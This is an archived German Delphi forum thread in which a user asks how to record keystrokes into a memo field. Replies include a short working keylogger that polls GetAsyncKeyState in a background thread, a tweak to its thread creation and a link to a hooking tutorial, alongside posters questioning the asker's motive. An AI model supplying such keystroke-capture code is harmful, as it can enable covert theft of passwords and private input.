Entwickler-Ecke
Delphi Language (Object-Pascal) / CLX - Tastatur eingaben aufzeichnen?
jackie05 - Sa 23.08.08 00:07
Titel: Tastatur eingaben aufzeichnen?
Hallo,
ich wollte mal versuchen Tastatur eingaben aufzuzeichnen mit Hook Code oder wie man das nennt.
Wie könnte ich das am einfachsten realisieren, das diese dann in einem Memo Feld gespeichert wird?
Ich bedanke mich schonmal für die Hilfe.
MfG
wazup - Sa 23.08.08 06:50
Ich kanns nicht mal entpacken mekert der AntiVir schon rum :lol:
Hidden - Sa 23.08.08 07:19
Richtig so! Wozu brauchst du das überhaupt :?:
Timosch - Sa 23.08.08 14:03
wazup hat folgendes geschrieben: |
| Ich kanns nicht mal entpacken mekert der AntiVir schon rum :lol: |
Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben. :mrgreen:
Delete - Sa 23.08.08 14:12
| Zitat: |
| Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben. :mrgreen: |
Er hat nur gesagt das AntiVir rummeckert,nicht das er es nicht beheben kann.
Hier gibs ein Tut:http:[url]
http://www.assarbad.net/en/stuff/tutorials/hooks/[/url]
Boldar - Sa 23.08.08 14:18
Dass hier ist was simples in der Richtung:
Delphi-Quelltext
1: 2: 3: 4: 5: 6: 7: 8: 9: 10: 11: 12: 13: 14: 15: 16: 17:
| procedure keylogger; var i: integer; begin while true do begin for i := 10 to 200 do if boolean(getasynckeystate(i)) then form1.memo1.lines.Text := form1.Memo1.lines.Text + char(i); sleep(10); end; end; procedure TForm1.FormCreate(Sender: TObject); var tid: cardinal; begin createthread(0,0,@keylogger,nil,0,tid); end; |
Delete - Sa 23.08.08 14:29
Delphi-Quelltext
1: 2: 3: 4: 5:
| procedure TForm1.FormCreate(Sender: TObject); var tid: cardinal; begin createthread(0,0,@keylogger,nil,0,tid); end; |
So ist es besser:
Delphi-Quelltext
1: 2: 3: 4: 5:
| Procedure TForm1.FormCreate(Sender: TObject); var tid:cardinal; Thread:THandle; begin Thread:=BeginThread(nil,0,@Keylogger,nil,0,tid);end; |
:mahn:
:)
mfg,j.klugmann
Boldar - Sa 23.08.08 14:58
Was bringt denn beginthread??
Ich habe davon noch nie was gehört und immer createthread oder Tthread.execute benutzt.
Delete - Sa 23.08.08 15:22
Wie ich bereits sagte,es macht den Heap Thread-Sicher.
Eigentlich kapselt BeginThread CreateThread ,aber es setzt zusätzlich die globale
Variable IsMultiThreaded - :wink:
Ich glaub in Assabards Tut ist es auch so.Naja ich habs mir nie richtig angeguckt. :wink:
Robert.Wachtel - Sa 23.08.08 16:40
Timosch hat folgendes geschrieben: |
wazup hat folgendes geschrieben: | | Ich kanns nicht mal entpacken mekert der AntiVir schon rum :lol: |
Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben. :mrgreen: |
Das tut er doch auch gar nicht...
Hidden - Sa 23.08.08 17:08
Robert.Wachtel hat folgendes geschrieben: |
Timosch hat folgendes geschrieben: | | Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben |
Das tut er doch auch gar nicht... |
Imho doch:
jackie05 hat folgendes geschrieben: |
| Tastatur eingaben aufzuzeichnen |
Ich wiederhole mich mal:
Hidden hat folgendes geschrieben: |
| Richtig so! Wozu brauchst du das überhaupt :?: |
mfG,
Delete - Sa 23.08.08 17:13
Ich glaub nicht das er was Illegales machen will. :roll:
wazup - Sa 23.08.08 17:14
Ich hoff um mich geht es momentan nicht... Ich will nehmlich keinen Programmieren :!:
Falls ich so etwas mache wende ich mich an Freunde um dem "Was willst du damit"-Fragen zu entgehen ^^
Christian S. - Sa 23.08.08 17:15
Ich würde sagen, ihr wartet jetzt erst einmal, was der Fragesteller zu der Sache zu sagen hat. Weitere Postings sind bis dahin nicht sinnvoll. :-)
F34r0fTh3D4rk - Sa 23.08.08 18:09
Hidden hat folgendes geschrieben: |
Robert.Wachtel hat folgendes geschrieben: | Timosch hat folgendes geschrieben: | | Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben |
Das tut er doch auch gar nicht... |
Imho doch:
jackie05 hat folgendes geschrieben: | | Tastatur eingaben aufzuzeichnen |
|
jackie05 <>
wazup :!:
um weitere Verwirrungen vorzubeugen ;)
Hidden - Sa 23.08.08 18:29
aso :)
Hab garnicht hingesehen, wen Robert.Wachtel zitiert und gedacht es ginge um den Threadsteller^^
Entwickler-Ecke.de based on phpBB
Copyright 2002 - 2011 by Tino Teuber, Copyright 2011 - 2026 by Christian Stelzmann Alle Rechte vorbehalten.
Alle Beiträge stammen von dritten Personen und dürfen geltendes Recht nicht verletzen.
Entwickler-Ecke und die zugehörigen Webseiten distanzieren sich ausdrücklich von Fremdinhalten jeglicher Art!